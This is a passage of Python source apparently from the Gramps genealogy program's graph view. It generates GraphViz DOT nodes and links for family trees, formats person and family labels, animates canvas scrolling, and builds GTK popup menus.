else:
return
if num_generations <= 0:
return
for family_handle in person.get_parent_family_handle_list():
family = self.database.get_family_from_handle(family_handle)
# add parents
sp_persons = []
for sp_handle in (family.get_father_handle(),
family.get_mother_handle()):
if sp_handle and sp_handle not in person_handles:
sp_person = self.database.get_person_from_handle(sp_handle)
self.add_ancestor(sp_person,
num_generations - 1,
person_handles)
sp_persons.append(sp_person)
# add all other spouses of the parents
for sp_person in sp_persons:
self.add_spouses(sp_person, person_handles)
def add_child_links_to_families(self):
"""
Write the GraphViz edges linking children to their families.
"""
for person_handle in self.person_handles:
person = self.database.get_person_from_handle(person_handle)
for fam_handle in person.get_parent_family_handle_list():
family = self.database.get_family_from_handle(fam_handle)
father_handle = family.get_father_handle()
mother_handle = family.get_mother_handle()
for child_ref in family.get_child_ref_list():
if child_ref.ref == person_handle:
frel = child_ref.frel
mrel = child_ref.mrel
break
if((father_handle in self.person_handles) or
(mother_handle in self.person_handles)):
# link to the family node if either parent is in graph
self.add_family_link(person_handle, family, frel, mrel)
def add_family_link(self, p_id, family, frel, mrel):
"""
Links the child to a family.
"""
style = 'solid'
adopted = ((int(frel) != ChildRefType.BIRTH) or
(int(mrel) != ChildRefType.BIRTH))
# if birth relation to father is NONE, meaning there is no father and
# if birth relation to mother is BIRTH then solid line
if((int(frel) == ChildRefType.NONE) and
(int(mrel) == ChildRefType.BIRTH)):
adopted = False
if adopted:
style = 'dotted'
self.add_link(family.handle, p_id, style,
self.arrowheadstyle, self.arrowtailstyle,
color=self.colors['home_path_color'],
bold=self.is_in_path_to_home(p_id))
def add_parent_link(self, p_id, parent_handle, rel):
"""
Links the child to a parent.
"""
style = 'solid'
if int(rel) != ChildRefType.BIRTH:
style = 'dotted'
self.add_link(parent_handle, p_id, style,
self.arrowheadstyle, self.arrowtailstyle,
color=self.colors['home_path_color'],
bold=self.is_in_path_to_home(p_id))
def add_persons_and_families(self):
"""
Adds nodes for persons and their families.
Subgraphs are used to indicate to Graphviz that parents of families
should be positioned together. The person_handles list is sorted so
that people with the largest number of spouses are at the start of the
list. As families are only processed once, this means people with
multiple spouses will have their additional spouses included in their
subgraph.
"""
# variable to communicate with get_person_label
url = ""
# The list of families for which we have output the node,
# so we don't do it twice
# use set() as it is a little faster than list()
family_nodes_done = set()
family_links_done = set()
for person_handle in self.person_handles:
person = self.database.get_person_from_handle(person_handle)
# Output the person's node
label = self.get_person_label(person)
(shape, style, color, fill) = self.get_gender_style(person)
self.add_node(person_handle, label, shape, color, style, fill, url)
# Output family nodes where person is a parent
family_list = person.get_family_handle_list()
for fam_handle in family_list:
if fam_handle not in family_nodes_done:
family_nodes_done.add(fam_handle)
self.__add_family_node(fam_handle)
# Output family links where person is a parent
subgraph_started = False
family_list = person.get_family_handle_list()
for fam_handle in family_list:
if fam_handle not in family_links_done:
family_links_done.add(fam_handle)
if not subgraph_started:
subgraph_started = True
self.start_subgraph(person_handle)
self.__add_family_links(fam_handle)
if subgraph_started:
self.end_subgraph()
def is_in_path_to_home(self, f_handle):
"""
Is the current person in the path to the home person?
"""
if f_handle in self.current_list:
return True
return False
def __add_family_node(self, fam_handle):
"""
Add a node for a family.
"""
fam = self.database.get_family_from_handle(fam_handle)
fill, color = color_graph_family(fam, self.dbstate)
style = "filled"
label = self.get_family_label(fam)
self.add_node(fam_handle, label, "ellipse", color, style, fill)
def __add_family_links(self, fam_handle):
"""
Add the links for spouses.
"""
fam = self.database.get_family_from_handle(fam_handle)
f_handle = fam.get_father_handle()
m_handle = fam.get_mother_handle()
if f_handle in self.person_handles:
self.add_link(f_handle,
fam_handle, "",
self.arrowheadstyle,
self.arrowtailstyle,
color=self.colors['home_path_color'],
bold=self.is_in_path_to_home(f_handle))
if m_handle in self.person_handles:
self.add_link(m_handle,
fam_handle, "",
self.arrowheadstyle,
self.arrowtailstyle,
color=self.colors['home_path_color'],
bold=self.is_in_path_to_home(m_handle))
def get_gender_style(self, person):
"""
Return gender specific person style.
"""
gender = person.get_gender()
shape = "box"
style = "solid, filled"
# get alive status of person to get box color
try:
alive = probably_alive(person, self.dbstate.db)
except RuntimeError:
alive = False
fill, color = color_graph_box(alive, gender)
return(shape, style, color, fill)
def get_tags_and_table(self, obj):
"""
Return html tags table for obj (person or family).
"""
tag_table = ''
tags = []
for tag_handle in obj.get_tag_list():
tags.append(self.dbstate.db.get_tag_from_handle(tag_handle))
# prepare html table of tags
if tags:
tag_table = ('<TABLE BORDER="0" CELLBORDER="0" '
'CELLPADDING="5"><TR>')
for tag in tags:
rgba = Gdk.RGBA()
rgba.parse(tag.get_color())
value = '#%02x%02x%02x' % (int(rgba.red * 255),
int(rgba.green * 255),
int(rgba.blue * 255))
tag_table += '<TD BGCOLOR="%s"></TD>' % value
tag_table += '</TR></TABLE>'
return tags, tag_table
def get_person_themes(self, index=-1):
"""
Person themes.
If index == -1 return list of themes.
If index is out of range, return the default theme.
"""
person_themes = [
(0, _('Default'),
'<TABLE '
'BORDER="0" CELLSPACING="2" CELLPADDING="0" CELLBORDER="0">'
'<TR><TD>%(img)s</TD></TR>'
'<TR><TD><FONT POINT-SIZE="%(bsize)3.1f"><B>%(name)s</B>'
'</FONT></TD></TR>'
'<TR><TD ALIGN="LEFT">%(birth_str)s</TD></TR>'
'<TR><TD ALIGN="LEFT">%(death_str)s</TD></TR>'
'<TR><TD>%(tags)s</TD></TR>'
'</TABLE>'
),
(1, _('Image on right side'),
'<TABLE '
'BORDER="0" CELLSPACING="5" CELLPADDING="0" CELLBORDER="0">'
'<tr>'
'<td colspan="2"><FONT POINT-SIZE="%(bsize)3.1f"><B>%(name)s'
'</B></FONT></td>'
'</tr>'
'<tr>'
'<td ALIGN="LEFT" BALIGN="LEFT" CELLPADDING="5">%(birth_wraped)s'
'</td>'
'<td rowspan="2">%(img)s</td>'
'</tr>'
'<tr>'
'<td ALIGN="LEFT" BALIGN="LEFT" CELLPADDING="5">%(death_wraped)s'
'</td>'
'</tr>'
'<tr>'
' <td colspan="2">%(tags)s</td>'
'</tr>'
'</TABLE>'
),
(2, _('Image on left side'),
'<TABLE '
'BORDER="0" CELLSPACING="5" CELLPADDING="0" CELLBORDER="0">'
'<tr>'
'<td colspan="2"><FONT POINT-SIZE="%(bsize)3.1f"><B>%(name)s'
'</B></FONT></td>'
'</tr>'
'<tr>'
'<td rowspan="2">%(img)s</td>'
'<td ALIGN="LEFT" BALIGN="LEFT" CELLPADDING="5">%(birth_wraped)s'
'</td>'
'</tr>'
'<tr>'
'<td ALIGN="LEFT" BALIGN="LEFT" CELLPADDING="5">%(death_wraped)s'
'</td>'
'</tr>'
'<tr>'
' <td colspan="2">%(tags)s</td>'
'</tr>'
'</TABLE>'
),
(3, _('Normal'),
'<TABLE '
'BORDER="0" CELLSPACING="2" CELLPADDING="0" CELLBORDER="0">'
'<TR><TD>%(img)s</TD></TR>'
'<TR><TD><FONT POINT-SIZE="%(bsize)3.1f"><B>%(name)s'
'</B></FONT></TD></TR>'
'<TR><TD ALIGN="LEFT" BALIGN="LEFT">%(birth_wraped)s</TD></TR>'
'<TR><TD ALIGN="LEFT" BALIGN="LEFT">%(death_wraped)s</TD></TR>'
'<TR><TD>%(tags)s</TD></TR>'
'</TABLE>'
)]
if index < 0:
return person_themes
if index < len(person_themes):
return person_themes[index]
else:
return person_themes[0]
def get_person_label(self, person):
"""
Return person label string (with tags).
"""
# Start an HTML table.
# Remember to close the table afterwards!
#
# This isn't a free-form HTML format here...just a few keywords that
# happen to be similar to keywords commonly seen in HTML.
# For additional information on what is allowed, see:
#
# http://www.graphviz.org/info/shapes.html#html
#
# Will use html.escape to avoid '&', '<', '>' in the strings.
# FIRST get all strings: img, name, dates, tags
# see if we have an image to use for this person
image = ''
if self.show_images:
image = self.view.graph_widget.get_person_image(person,
kind='path')
if not image and self.show_avatars:
image = self.avatars.get_avatar(gender=person.gender)
if image is not None:
image = '<IMG SRC="%s"/>' % image
else:
image = ''
# get the person's name
name = displayer.display_name(person.get_primary_name())
# name string should not be empty
name = escape(name) if name else ' '
# birth and death are lists of [date, place]
birth, death = self.get_date_strings(person)
birth_str = ''
death_str = ''
birth_wraped = ''
death_wraped = ''
# There are two ways of displaying dates:
# 1) full and on two lines:
# b. 1890-12-31 - BirthPlace
# d. 1960-01-02 - DeathPlace
if self.show_full_dates or self.show_places:
# add symbols
if birth[0]:
birth[0] = _('%s %s') % (self.bth, birth[0])
birth_wraped = birth[0]
birth_str = birth[0]
if birth[1]:
birth_wraped += '<BR/>'
birth_str += ' '
elif birth[1]:
birth_wraped = _('%s ') % self.bth
birth_str = _('%s ') % self.bth
birth_wraped += birth[1]
birth_str += birth[1]
if death[0]:
death[0] = _('%s %s') % (self.dth, death[0])
death_wraped = death[0]
death_str = death[0]
if death[1]:
death_wraped += '<BR/>'
death_str += ' '
elif death[1]:
death_wraped = _('%s ') % self.dth
death_str = _('%s ') % self.dth
death_wraped += death[1]
death_str += death[1]
# 2) simple and on one line:
# (1890 - 1960)
else:
if birth[0] or death[0]:
birth_str = '(%s - %s)' % (birth[0], death[0])
# add symbols
if image:
if birth[0]:
birth_wraped = _('%s %s') % (self.bth, birth[0])
if death[0]:
death_wraped = _('%s %s') % (self.dth, death[0])
else:
birth_wraped = birth_str
# get tags table for person and add tooltip for node
tag_table = ''
if self.show_tag_color:
tags, tag_table = self.get_tags_and_table(person)
if tag_table:
self.add_tags_tooltip(person.handle, tags)
# apply theme to person label
if(image or self.person_theme_index == 0 or
self.person_theme_index == 3):
p_theme = self.get_person_themes(self.person_theme_index)
else:
# fall back to the 'Normal' theme when there is no image
p_theme = self.get_person_themes(3)
label = p_theme[2] % {'img': image,
'name': name,
'birth_str': birth_str,
'death_str': death_str,
'birth_wraped': birth_wraped,
'death_wraped': death_wraped,
'tags': tag_table,
'bsize' : self.bold_size}
return label
def get_family_label(self, family):
"""
Return family label string (with tags).
"""
# start main html table
label = ('<TABLE '
'BORDER="0" CELLSPACING="2" CELLPADDING="0" CELLBORDER="0">')
# add date strings to the table
event_str = ['', '']
for event_ref in family.get_event_ref_list():
event = self.database.get_event_from_handle(event_ref.ref)
if (event.type == EventType.MARRIAGE and
(event_ref.get_role() == EventRoleType.FAMILY or
event_ref.get_role() == EventRoleType.PRIMARY)):
event_str = self.get_event_string(event)
break
if event_str[0] and event_str[1]:
event_str = '%s<BR/>%s' % (event_str[0], event_str[1])
elif event_str[0]:
event_str = event_str[0]
elif event_str[1]:
event_str = event_str[1]
else:
event_str = ''
label += '<TR><TD>%s</TD></TR>' % event_str
# add tags table for family and add tooltip for node
if self.show_tag_color:
tags, tag_table = self.get_tags_and_table(family)
if tag_table:
label += '<TR><TD>%s</TD></TR>' % tag_table
self.add_tags_tooltip(family.handle, tags)
# close main table
label += '</TABLE>'
return label
def get_date_strings(self, person):
"""
Returns a tuple of birth/christening and death/burial date strings.
"""
birth_event = get_birth_or_fallback(self.database, person)
if birth_event:
birth = self.get_event_string(birth_event)
else:
birth = ['', '']
death_event = get_death_or_fallback(self.database, person)
if death_event:
death = self.get_event_string(death_event)
else:
death = ['', '']
return (birth, death)
def get_event_string(self, event):
"""
Return string for an event label.
Based on the data availability and preferences, we select one
of the following for a given event:
year only
complete date
place name
empty string
"""
if event:
place_title = place_displayer.display_event(self.database, event,
fmt=self.place_format)
date_object = event.get_date_object()
date = ''
place = ''
# shall we display full date
# or do we have a valid year to display only year
if(self.show_full_dates and date_object.get_text() or
date_object.get_year_valid()):
if self.show_full_dates:
date = '%s' % datehandler.get_date(event)
else:
date = '%i' % date_object.get_year()
# shall we add the place?
if self.show_places and place_title:
place = place_title
return [escape(date), escape(place)]
else:
if place_title and self.show_places:
return ['', escape(place_title)]
return ['', '']
def add_link(self, id1, id2, style="", head="", tail="", comment="",
bold=False, color=""):
"""
Add a link between two nodes.
Gramps handles are used as nodes but need to be prefixed
with an underscore because Graphviz does not like IDs
that begin with a number.
"""
self.write(' _%s -> _%s' % (id1, id2))
boldok = False
if id1 in self.current_list:
if id2 in self.current_list:
boldok = True
self.write(' [')
if style:
self.write(' style=%s' % style)
if head:
self.write(' arrowhead=%s' % head)
if tail:
self.write(' arrowtail=%s' % tail)
if bold and boldok:
self.write(' penwidth=%d' % 5)
if color:
self.write(' color="%s"' % color)
else:
# if not in the path to home then use the default link color
self.write(' color="%s"' % self.colors['link_color'])
self.write(' ]')
self.write(';')
if comment:
self.write(' // %s' % comment)
self.write('\n')
def add_node(self, node_id, label, shape="", color="",
style="", fillcolor="", url="", fontsize=""):
"""
Add a node to this graph.
Nodes can be different shapes like boxes and circles.
Gramps handles are used as nodes but need to be prefixed with an
underscore because Graphviz does not like IDs that begin with a number.
"""
text = '[margin="0.11,0.08"'
if shape:
text += ' shape="%s"' % shape
if color:
text += ' color="%s"' % color
if fillcolor:
color = hex_to_rgb_float(fillcolor)
yiq = (color[0] * 299 + color[1] * 587 + color[2] * 114)
fontcolor = "#ffffff" if yiq < 500 else "#000000"
text += ' fillcolor="%s" fontcolor="%s"' % (fillcolor, fontcolor)
if style:
text += ' style="%s"' % style
if fontsize:
text += ' fontsize="%s"' % fontsize
# note that we always output a label -- even if an empty string --
# otherwise GraphViz uses the node ID as the label which is unlikely
# to be what the user wants to see in the graph
text += ' label=<%s>' % label
if url:
text += ' URL="%s"' % url
text += " ]"
self.write(' _%s %s;\n' % (node_id, text))
def add_tags_tooltip(self, handle, tag_list):
"""
Add tooltip to dict {handle, tooltip}.
"""
tooltip_str = _('<b>Tags:</b>')
for tag in tag_list:
tooltip_str += ('\n<span background="%s"> </span> - %s'
% (tag.get_color(), tag.get_name()))
self.view.tags_tooltips[handle] = tooltip_str
def start_subgraph(self, graph_id):
"""
Opens a subgraph which is used to keep together related nodes
on the graph.
"""
self.write('\n subgraph cluster_%s\n' % graph_id)
self.write(' {\n')
# no border around subgraph (#0002176)
self.write(' style="invis";\n')
def end_subgraph(self):
"""
Closes a subgraph section.
"""
self.write(' }\n\n')
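# Together start_subgraph() and end_subgraph() wrap related nodes in DOT
# along these lines (the cluster id is a person handle, illustrative here):
#   subgraph cluster_a1b2c3
#   {
#     style="invis";
#     ... person and family nodes ...
#   }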
def write(self, text):
"""
Write text to the dot file.
"""
if self.dot:
self.dot.write(text)
#-------------------------------------------------------------------------
#
# CanvasAnimation
#
#-------------------------------------------------------------------------
class CanvasAnimation(object):
"""
Produce animations for operations on the canvas.
"""
def __init__(self, view, canvas, scroll_window):
"""
We need the canvas and the scroll window in which it is placed,
and the view to get the config.
"""
self.view = view
self.canvas = canvas
self.hadjustment = scroll_window.get_hadjustment()
self.vadjustment = scroll_window.get_vadjustment()
self.items_list = []
self.in_motion = False
self.max_count = self.view._config.get(
'interface.graphview-animation-count')
self.max_count = self.max_count * 2 # must be even
self.show_animation = self.view._config.get(
'interface.graphview-show-animation')
# delay between steps in microseconds
self.speed = self.view._config.get(
'interface.graphview-animation-speed')
self.speed = 50 * int(self.speed)
# length of step
self.step_len = 10
# separate counter and shake direction
# for each item that is in the shake procedure
self.counter = {}
self.shake = {}
self.in_shake = []
def update_items(self, items_list):
"""
Update list of items for current graph.
"""
self.items_list.clear()
self.items_list.extend(items_list)
self.in_shake.clear()
# clear counters and shakes - the items no longer exist
self.counter.clear()
self.shake.clear()
def stop_animation(self):
"""
Stop the move_to animation
and wait until the thread has finished.
"""
self.in_motion = False
try:
self.thread.join()
except:
pass
def stop_shake_animation(self, item, stopped):
"""
Processing of 'animation-finished' signal.
Stop or keep shaking the item depending on its counter.
"""
counter = self.counter.get(item.title)
shake = self.shake.get(item.title)
if (not stopped) and counter and shake and counter < self.max_count:
self.shake[item.title] = (-1) * self.shake[item.title]
self.counter[item.title] += 1
item.animate(0, self.shake[item.title], 1, 0, False,
self.speed, 10, 0)
else:
item.disconnect_by_func(self.stop_shake_animation)
try:
self.counter.pop(item.title)
self.shake.pop(item.title)
except:
pass
def shake_person(self, person_handle):
"""
Shake the person node to help the user see it.
Uses the built-in animation function of CanvasItem.
"""
item = self.get_item_by_title(person_handle)
if item:
self.shake_item(item)
def shake_item(self, item):
"""
Shake the item to help the user see it.
Uses the built-in animation function of CanvasItem.
"""
if item and self.show_animation and self.max_count > 0:
if not self.counter.get(item.title):
self.in_shake.append(item)
self.counter[item.title] = 1
self.shake[item.title] = 10
item.connect('animation-finished', self.stop_shake_animation)
item.animate(0, self.shake[item.title], 1, 0, False,
self.speed, 10, 0)
def get_item_by_title(self, handle):
"""
Find item by title.
"""
if handle:
for item in self.items_list:
if item.title == handle:
return item
return None
def move_to_person(self, handle, animated):
"""
Move graph to specified person by handle.
"""
self.stop_animation()
item = self.get_item_by_title(handle)
if item:
bounds = item.get_bounds()
# calculate middle of node coordinates
xxx = (bounds.x2 - (bounds.x2 - bounds.x1) / 2)
yyy = (bounds.y1 - (bounds.y1 - bounds.y2) / 2)
self.move_to(item, (xxx, yyy), animated)
return True
return False
def get_trace_to(self, destination):
"""
Return next point to destination from current position.
"""
# get current position (left-top corner) with scale
start_x = self.hadjustment.get_value() / self.canvas.get_scale()
start_y = self.vadjustment.get_value() / self.canvas.get_scale()
x_delta = destination[0] - start_x
y_delta = destination[1] - start_y
# calculate step count depending on length of the trace
trace_len = sqrt(pow(x_delta, 2) + pow(y_delta, 2))
steps_count = int(trace_len / self.step_len * self.canvas.get_scale())
# prevent division by 0
if steps_count > 0:
x_step = x_delta / steps_count
y_step = y_delta / steps_count
point = (start_x + x_step, start_y + y_step)
else:
point = destination
return point
def scroll_canvas(self, point):
"""
Scroll window to point on canvas.
"""
self.canvas.scroll_to(point[0], point[1])
def animation(self, item, destination):
"""
Animate scrolling to destination point in thread.
Dynamically get points to destination one by one
and try to scroll to them.
"""
self.in_motion = True
while self.in_motion:
# correct destination to window centre
h_offset = self.hadjustment.get_page_size() / 2
v_offset = self.vadjustment.get_page_size() / 3
# apply the scaling factor so the offset is adjusted to the scale
h_offset = h_offset / self.canvas.get_scale()
v_offset = v_offset / self.canvas.get_scale()
dest = (destination[0] - h_offset,
destination[1] - v_offset)
# get maximum scroll of window
max_scroll_x = ((self.hadjustment.get_upper() -
self.hadjustment.get_page_size()) /
self.canvas.get_scale())
max_scroll_y = ((self.vadjustment.get_upper() -
self.vadjustment.get_page_size()) /
self.canvas.get_scale())
# fix destination to fit in max scroll
if dest[0] > max_scroll_x:
dest = (max_scroll_x, dest[1])
if dest[0] < 0:
dest = (0, dest[1])
if dest[1] > max_scroll_y:
dest = (dest[0], max_scroll_y)
if dest[1] < 0:
dest = (dest[0], 0)
cur_pos = (self.hadjustment.get_value() / self.canvas.get_scale(),
self.vadjustment.get_value() / self.canvas.get_scale())
# finish if we are already at the destination
if dest == cur_pos:
break
# get next point to destination
point = self.get_trace_to(dest)
GLib.idle_add(self.scroll_canvas, point)
GLib.usleep(20 * self.speed)
# finish once the next point is the destination itself
if point == dest:
break
self.in_motion = False
# shake item after scroll to it
self.shake_item(item)
def move_to(self, item, destination, animated):
"""
Move graph to specified position.
If 'animated' is True then movement will be animated.
It works with 'canvas.scroll_to' in thread.
"""
# if animated is True then run a thread with the animation
# else - just scroll_to immediately
if animated and self.show_animation:
self.thread = Thread(target=self.animation,
args=[item, destination])
self.thread.start()
else:
# correct destination to screen centre
h_offset = self.hadjustment.get_page_size() / 2
v_offset = self.vadjustment.get_page_size() / 3
# apply the scaling factor so the offset is adjusted to the scale
h_offset = h_offset / self.canvas.get_scale()
v_offset = v_offset / self.canvas.get_scale()
destination = (destination[0] - h_offset,
destination[1] - v_offset)
self.scroll_canvas(destination)
# shake item after scroll to it
self.shake_item(item)
#-------------------------------------------------------------------------
#
# Popup menu widget
#
#-------------------------------------------------------------------------
class PopupMenu(Gtk.Menu):
"""
Produce popup widget for right-click menu.
"""
def __init__(self, graph_widget, kind=None, handle=None):
"""
graph_widget: GraphWidget
kind: 'person', 'family', 'background'
handle: person or family handle
"""
Gtk.Menu.__init__(self)
self.set_reserve_toggle_size(False)
self.graph_widget = graph_widget
self.view = graph_widget.view
self.dbstate = graph_widget.dbstate
self.actions = graph_widget.actions
if kind == 'background':
self.background_menu()
elif kind == 'person' and handle is not None:
self.person_menu(handle)
elif kind == 'family' and handle is not None:
self.family_menu(handle)
def show_menu(self, event=None):
"""
Show popup menu.
"""
if (Gtk.MAJOR_VERSION >= 3) and (Gtk.MINOR_VERSION >= 22):
# new from gtk 3.22:
self.popup_at_pointer(event)
else:
if event:
self.popup(None, None, None, None,
event.get_button()[1], event.time)
else:
self.popup(None, None, None, None,
0, Gtk.get_current_event_time())
#self.popup(None, None, None, None, 0, 0)
def background_menu(self):
"""
Popup menu on background.
"""
menu_item = Gtk.CheckMenuItem(_('Show images'))
menu_item.set_active(
self.view._config.get('interface.graphview-show-images'))
menu_item.connect("activate", self.graph_widget.update_setting,
'interface.graphview-show-images')
menu_item.show()
self.append(menu_item)
menu_item = Gtk.CheckMenuItem(_('Highlight the home person'))
menu_item.set_active(
self.view._config.get('interface.graphview-highlight-home-person'))
menu_item.connect("activate", self.graph_widget.update_setting,
'interface.graphview-highlight-home-person')
menu_item.show()
self.append(menu_item)
menu_item = Gtk.CheckMenuItem(_('Show full dates'))
menu_item.set_active(
self.view._config.get('interface.graphview-show-full-dates'))
menu_item.connect("activate", self.graph_widget.update_setting,
'interface.graphview-show-full-dates')
menu_item.show()
self.append(menu_item)
menu_item = Gtk.CheckMenuItem(_('Show places'))
menu_item.set_active(
self.view._config.get('interface.graphview-show-places'))
menu_item.connect("activate", self.graph_widget.update_setting,
'interface.graphview-show-places')
menu_item.show()
self.append(menu_item)
menu_item = Gtk.CheckMenuItem(_('Show tags'))
menu_item.set_active(
self.view._config.get('interface.graphview-show-tags'))
menu_item.connect("activate", self.graph_widget.update_setting,
'interface.graphview-show-tags')
menu_item.show()
self.append(menu_item)
self.add_separator()
menu_item = Gtk.CheckMenuItem(_('Show animation'))
menu_item.set_active(
self.view._config.get('interface.graphview-show-animation'))
menu_item.connect("activate", self.graph_widget.update_setting,
'interface.graphview-show-animation')
menu_item.show()
self.append(menu_item)
# add sub menu for line type setting
menu_item, sub_menu = self.add_submenu(label=_('Lines type'))
spline = self.view._config.get('interface.graphview-show-lines')
entry = Gtk.RadioMenuItem(label=_('Direct'))
entry.connect("activate", self.graph_widget.update_lines_type,
0, 'interface.graphview-show-lines')
if spline == 0:
entry.set_active(True)
entry.show()
sub_menu.append(entry)
entry = Gtk.RadioMenuItem(label=_('Curves'))
entry.connect("activate", self.graph_widget.update_lines_type,
1, 'interface.graphview-show-lines')
if spline == 1:
entry.set_active(True)
entry.show()
sub_menu.append(entry)
entry = Gtk.RadioMenuItem(label=_('Ortho'))
entry.connect("activate", self.graph_widget.update_lines_type,
2, 'interface.graphview-show-lines')
if spline == 2:
entry.set_active(True)
entry.show()
sub_menu.append(entry)
# add help menu
self.add_separator()
self.append_help_menu_entry()
def person_menu(self, handle):
"""
Popup menu for person node.
"""
person = self.dbstate.db.get_person_from_handle(handle)
if person:
add_menuitem(self, _('Edit'),
handle, self.actions.edit_person)
add_menuitem(self, _('Copy'),
handle, self.actions.copy_person_to_clipboard)
add_menuitem(self, _('Delete'),
person, self.actions.remove_person)
self.add_separator()
# build tag submenu
item, tag_menu = self.add_submenu(label=_("Tags"))
add_menuitem(tag_menu, _('Select tags for person'),
[handle, 'person'], self.actions.edit_tag_list)
add_menuitem(tag_menu, _('Organize Tags...'),
[handle, 'person'], self.actions.organize_tags)
# go over spouses and build their menu
item, sp_menu = self.add_submenu(label=_("Spouses"))
add_menuitem(sp_menu, _('Add new family'),
handle, self.actions.add_spouse)
self.add_separator(sp_menu)
fam_list = person.get_family_handle_list()
for fam_id in fam_list:
family = self.dbstate.db.get_family_from_handle(fam_id)
if family.get_father_handle() == person.get_handle():
sp_id = family.get_mother_handle()
else:
sp_id = family.get_father_handle()
if not sp_id:
continue
spouse = self.dbstate.db.get_person_from_handle(sp_id)
if not spouse:
continue
self.add_menuitem(sp_menu, displayer.display(spouse),
self.graph_widget.move_to_person,
sp_id, True)
# go over siblings and build their menu
item, sib_menu = self.add_submenu(label=_("Siblings"))
pfam_list = person.get_parent_family_handle_list()
siblings = []
step_siblings = []
for f_h in pfam_list:
fam = self.dbstate.db.get_family_from_handle(f_h)
sib_list = fam.get_child_ref_list()
for sib_ref in sib_list:
sib_id = sib_ref.ref
if sib_id == person.get_handle():
continue
siblings.append(sib_id)
# collect a list of per-step-family step-siblings
for parent_h in [fam.get_father_handle(),
fam.get_mother_handle()]:
if not parent_h:
continue
parent = self.dbstate.db.get_person_from_handle(
parent_h)
other_families = [
self.dbstate.db.get_family_from_handle(fam_id)
for fam_id in parent.get_family_handle_list()
if fam_id not in pfam_list]
for step_fam in other_families:
fam_stepsiblings = [
sib_ref.ref for sib_ref in
step_fam.get_child_ref_list()
if not sib_ref.ref == person.get_handle()]
if fam_stepsiblings:
step_siblings.append(fam_stepsiblings)
# add siblings sub-menu with a separator between each sibling group
if siblings or step_siblings:
sibs = [siblings] + step_siblings
for sib_group in sibs:
for sib_id in sib_group:
sib = self.dbstate.db.get_person_from_handle(
sib_id)
if not sib:
continue
if find_children(self.dbstate.db, sib):
label = Gtk.Label(
label='<b><i>%s</i></b>'
% escape(displayer.display(sib)))
else:
label = Gtk.Label(
label=escape(displayer.display(sib)))
sib_item = Gtk.MenuItem()
label.set_use_markup(True)
label.show()
label.set_alignment(0, 0)
sib_item.add(label)
sib_item.connect("activate",
self.graph_widget.move_to_person,
sib_id, True)
sib_item.show()
sib_menu.append(sib_item)
if sibs.index(sib_group) < len(sibs) - 1:
self.add_separator(sib_menu)
else:
item.set_sensitive(0)
self.add_children_submenu(person=person)
# Go over parents and build their menu
item, par_menu = self.add_submenu(label=_("Parents"))
no_parents = True
par_list = find_parents(self.dbstate.db, person)
for par_id in par_list:
if not par_id:
continue
par = self.dbstate.db.get_person_from_handle(par_id)
if not par:
continue
if no_parents:
no_parents = False
if find_parents(self.dbstate.db, par):
label = Gtk.Label(label='<b><i>%s</i></b>'
% escape(displayer.display(par)))
else:
label = Gtk.Label(label=escape(displayer.display(par)))
par_item = Gtk.MenuItem()
label.set_use_markup(True)
label.show()
label.set_halign(Gtk.Align.START)
par_item.add(label)
par_item.connect("activate", self.graph_widget.move_to_person,
par_id, True)
par_item.show()
par_menu.append(par_item)
if no_parents:
# add button to add parents
add_menuitem(par_menu, _('Add parents'), handle,
self.actions.add_parents_to_person)
# go over related persons and build their menu
item, per_menu = self.add_submenu(label=_("Related"))
no_related = True
for p_id in find_witnessed_people(self.dbstate.db, person):
per = self.dbstate.db.get_person_from_handle(p_id)
if not per:
continue
if no_related:
no_related = False
self.add_menuitem(per_menu, displayer.display(per),
self.graph_widget.move_to_person,
p_id, True)
if no_related:
item.set_sensitive(0)
self.add_separator()
add_menuitem(self, _('Set as home person'),
handle, self.actions.set_home_person)
# check if we have person in bookmarks
marks = self.graph_widget.view.bookmarks.get_bookmarks().bookmarks
if handle in marks:
add_menuitem(self, _('Remove from bookmarks'), handle,
self.actions.remove_from_bookmarks)
else:
add_menuitem(self, _('Add to bookmarks'), [handle, person],
self.actions.add_to_bookmarks)
# QuickReports and WebConnect section
self.add_separator()
q_exists = self.add_quickreport_submenu(CATEGORY_QR_PERSON, handle)
w_exists = self.add_web_connect_submenu(handle)
if q_exists or w_exists:
self.add_separator()
self.append_help_menu_entry()
def add_quickreport_submenu(self, category, handle):
"""
Adds Quick Reports menu.
"""
def make_quick_report_callback(pdata, category, dbstate, uistate,
handle, track=[]):
return lambda x: run_report(dbstate, uistate, category, handle,
pdata, track=track)
# select the reports to show
showlst = []
pmgr = GuiPluginManager.get_instance()
for pdata in pmgr.get_reg_quick_reports():
if pdata.supported and pdata.category == category:
showlst.append(pdata)
showlst.sort(key=lambda x: x.name)
if showlst:
menu_item, quick_menu = self.add_submenu(_("Quick View"))
for pdata in showlst:
callback = make_quick_report_callback(
pdata, category, self.view.dbstate, self.view.uistate,
handle)
self.add_menuitem(quick_menu, pdata.name, callback)
return True
return False
def add_web_connect_submenu(self, handle):
"""
Adds the Web Connect menu if any Web Connect plugins are installed.
"""
def flatten(L):
"""
Flattens a possibly nested list. Removes None results, too.
"""
retval = []
if isinstance(L, (list, tuple)):
for item in L:
fitem = flatten(item)
if fitem is not None:
retval.extend(fitem)
elif L is not None:
retval.append(L)
return retval
# select the web connects to show
pmgr = GuiPluginManager.get_instance()
plugins = pmgr.process_plugin_data('WebConnect')
nav_group = self.view.navigation_type()
try:
connections = [plug(nav_group) if isinstance(plug, abc.Callable) else
plug for plug in plugins]
except BaseException:
import traceback
traceback.print_exc()
connections = []
connections = flatten(connections)
connections.sort(key=lambda plug: plug.name)
if connections:
menu_item, web_menu = self.add_submenu(_("Web Connection"))
for connect in connections:
callback = connect(self.view.dbstate, self.view.uistate,
nav_group, handle)
self.add_menuitem(web_menu, connect.name, callback)
return True
return False
def family_menu(self, handle):
"""
Popup menu for family node.
"""
family = self.dbstate.db.get_family_from_handle(handle)
if family:
add_menuitem(self, _('Edit'),
handle, self.actions.edit_family)
add_menuitem(self, _('Delete'),
family, self.actions.remove_family)
self.add_separator()
# build tag submenu
_item, tag_menu = self.add_submenu(label=_("Tags"))
add_menuitem(tag_menu, _('Select tags for family'),
[handle, 'family'], self.actions.edit_tag_list)
add_menuitem(tag_menu, _('Organize Tags...'),
[handle, 'family'], self.actions.organize_tags)
# build spouses menu
_item, sp_menu = self.add_submenu(label=_("Spouses"))
f_handle = family.get_father_handle()
m_handle = family.get_mother_handle()
if f_handle:
spouse = self.dbstate.db.get_person_from_handle(f_handle)
self.add_menuitem(sp_menu, displayer.display(spouse),
self.graph_widget.move_to_person,
f_handle, True)
else:
add_menuitem(sp_menu, _('Add father'), [family, 'father'],
self.actions.add_spouse_to_family)
